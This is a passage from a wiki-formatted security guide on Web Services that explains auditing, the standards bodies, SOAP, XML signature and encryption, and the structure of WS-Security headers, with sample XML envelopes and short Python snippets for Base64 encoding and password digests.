There is another significant problem here – traditional HTTP firewalls do not help stop attacks against Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
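For orientation, a minimal SOAP 1.2 envelope is sketched below; the payload element and its namespace are hypothetical, and a real message's Body would be governed by the service's WSDL schema.

```xml
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
  <env:Header>
    <!-- infrastructure concerns (security, routing) travel here -->
  </env:Header>
  <env:Body>
    <getQuote xmlns="urn:example:stocks">
      <symbol>ACME</symbol>
    </getQuote>
  </env:Body>
</env:Envelope>
```

The Header is where the protection mechanisms described later in this chapter attach, leaving the Body for the business payload.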
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Version 1.0 became an OASIS standard in 2004; version 1.1 followed in February 2006.&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one or more profile documents, which define the additional attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as authenticity, integrity, and freshness, and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data to higher-level protocols. Those protocols, based on standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard-to-detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, plus a set of profile documents. The profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section, under “Types of tokens”), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII formats and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
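As an illustration (not part of the specification), the Base64 transform can be demonstrated with a few lines of Python; the sample bytes are arbitrary stand-ins for real certificate or ticket data:&lt;br /&gt;

```python
import base64

# Arbitrary binary data standing in for an X.509 certificate or Kerberos ticket
raw = bytes(range(16))

# Base64-encode for embedding in an XML element such as wsse:BinarySecurityToken
encoded = base64.b64encode(raw).decode("ascii")
print(encoded)  # AAECAwQFBgcICQoLDA0ODw==

# The receiver applies the matching decoder to recover the original bytes
assert base64.b64decode(encoded) == raw
```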
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimal header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information which helps secure the message. This means including one or more security tokens (see “Types of tokens” below) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
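The digest computation can be sketched in Python; the nonce and timestamp below are made-up example values, and in a real UsernameToken the raw nonce octets (Base64-encoded for transport) and the wsu:Created string are the inputs:&lt;br /&gt;

```python
import base64
import hashlib

# Hypothetical example values; in a real message the nonce travels
# Base64-encoded alongside the wsu:Created timestamp in the UsernameToken.
nonce = b"0123456789abcdef"
created = "2005-01-27T16:46:10Z"
password = "secret"

# Password_Digest = Base64( SHA-1( nonce + created + password ) )
digest = base64.b64encode(
    hashlib.sha1(nonce + created.encode("utf-8") + password.encode("utf-8")).digest()
).decode("ascii")
print(digest)
```

Because the nonce and timestamp change with every message, the digest differs each time, which is what defeats straightforward replay of a captured token.&lt;br /&gt;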
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
These are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs must be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
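A receiver’s dereferencing logic for a Direct Reference URI of the form “#id” can be sketched with Python’s standard ElementTree; the document fragment and element names below are illustrative, not taken from the specification:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"

# Illustrative fragment: a token carrying a wsu:Id, referenced elsewhere by "#aXhOJ5"
doc = ET.fromstring(
    '<root xmlns:wsu="' + WSU + '">'
    '<token wsu:Id="aXhOJ5">MIICtzCCAi...</token>'
    '<other wsu:Id="s91397860"/>'
    '</root>'
)

def resolve(uri, root):
    """Return the element whose wsu:Id matches a Direct Reference URI ("#id")."""
    target = uri.lstrip("#")
    for el in root.iter():
        if el.get("{%s}Id" % WSU) == target:
            return el
    return None

print(resolve("#aXhOJ5", doc).text)  # MIICtzCCAi...
```

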